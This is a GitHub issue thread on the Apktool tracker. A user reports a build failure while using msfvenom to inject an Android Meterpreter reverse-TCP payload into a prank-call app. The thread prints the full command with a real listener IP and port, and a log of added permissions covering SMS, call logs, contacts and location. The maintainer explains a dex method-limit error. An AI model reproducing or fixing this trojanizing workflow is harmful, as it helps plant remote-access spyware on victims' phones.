### ISSUE TITLE
Error: apktool execution failed

### ISSUE THREAD

**Issue by Haaarshit010** [iBotPeaches/Apktool#3468]
┌──(kali㉿kali)-[~/Downloads/payload]
└─$  sudo msfvenom -x original.apk -p android/meterpreter/reverse_tcp lhost=159.203.126.35 lport=22249 -o ownagep.apk  
Using APK template: original.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.prankcalllabs.prankcallapp.bwreo
[*] Loading /tmp/d20231217-113577-7rredr/original/smali_classes2/com/prankcalllabs/prankcallapp/PrankerApplication.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20231217-113577-7rredr/output.apk
[-] I: Using Apktool 2.7.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Exception in thread "main" org.jf.util.ExceptionWithContext: Exception occurred while writing code_item for method Landroidx/collection/LongSparseArray;->clone()Landroidx/collection/LongSparseArray;
        at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1058)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:354)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:309)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:58)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:37)
        at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:437)
        at brut.androlib.Androlib.buildSources(Androlib.java:368)
        at brut.androlib.Androlib.build(Androlib.java:320)
        at brut.androlib.Androlib.build(Androlib.java:287)
        at brut.apktool.Main.cmdBuild(Main.java:263)
        at brut.apktool.Main.main(Main.java:82)
Caused by: org.jf.util.ExceptionWithContext: Error while writing instruction at code offset 0x12
        at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1331)
        at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1054)
        ... 10 more
Caused by: org.jf.util.ExceptionWithContext: Unsigned short value out of range: 65568
        at org.jf.dexlib2.writer.DexDataWriter.writeUshort(DexDataWriter.java:116)
        at org.jf.dexlib2.writer.InstructionWriter.write(InstructionWriter.java:356)
        at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1291)
        ... 11 more

Error: apktool execution failed
                                                                                                                                                                       
┌──(kali㉿kali)-[~/Downloads/payload]
└─$ 
version is any  
I tried again and again but this issue is still coming with the help of chatgpt given commands its still not solving please help

**Comment by iBotPeaches** [comment]
This comes up in this issue tracker many many many many times.

>  Caused by: org.jf.util.ExceptionWithContext: Unsigned short value out of range: 65568

You've exceeded max limit of methods allowed in a dex file. Applications are normally multidex, so each child package is normally at limit of methods. When you use tools like msfvenom - it just adds methods which can exceeded that maximum.

This is not something Apktool can automatically resolve.

**Comment by Haaarshit010** [comment]
I m sorry but I searched it in issue desk I can't find it sorry again
